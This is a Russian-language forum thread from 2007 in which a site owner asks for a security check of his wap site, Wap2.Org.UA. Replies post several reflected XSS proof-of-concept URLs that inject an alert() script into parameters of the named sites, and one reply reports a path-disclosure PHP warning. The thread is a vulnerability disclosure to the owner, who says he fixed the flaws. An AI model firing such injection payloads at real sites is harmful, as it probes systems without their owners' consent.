PDA

Просмотр полной версии : Wap2.Org.UA

mr.The
14.11.2007, 19:01
Проверьте плз мой проэкт: Wap2.Org.UA

ЗЫ. Писался полностью с нуля.
v1ru$
14.11.2007, 20:17
по ссылке попал сюда,тоже твой сайт

http://bannerik.com/ru/help.php?str=xhtml&ref=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E

пассивные xss,активных ненашёл,и вообще ничего серьёзного

http://wap2.org.ua/add.php?str=wml&id=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E


http://wap2.org.ua/news.php?do=show&id=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E


http://wap2.org.ua/show.php?do=del&id=3%22%3E%3Cscript%3Ealert('xss')%3C/script%3E


http://wap2.org.ua/show.php?do=2me&id=%22%3E%3Cscript%3Ealert()%3C/script%3E
mr.The
14.11.2007, 22:14
по ссылке попал сюда,тоже твой сайт
угу. наверна 404 ошибка была... оно туда перекидывает...

пассивные xss,активных ненашёл,и вообще ничего серьёзного
это радует. всё пофиксил.
Helios
15.11.2007, 01:54
Не уязвимость, но недочет: при просмотре в виде wml не все теги закрыты согласно стандартам wml/xhtml, в частности рисунки. Опера матерится
mr.The
15.11.2007, 16:49
спс. буду править...
Shred
15.11.2007, 19:01
Раскрытие пути :)

Warning: main(shapka.php) [function.main]: failed to open stream: No such file or directory in /home/aziya/public_html/zak/panel.php on line 2

проявляется после некоторого простоя после логина в систему.
mr.The
15.11.2007, 19:47
угу.

какой ч[м]удак проверял сайт сканером? делать нехер было? еле отчистил...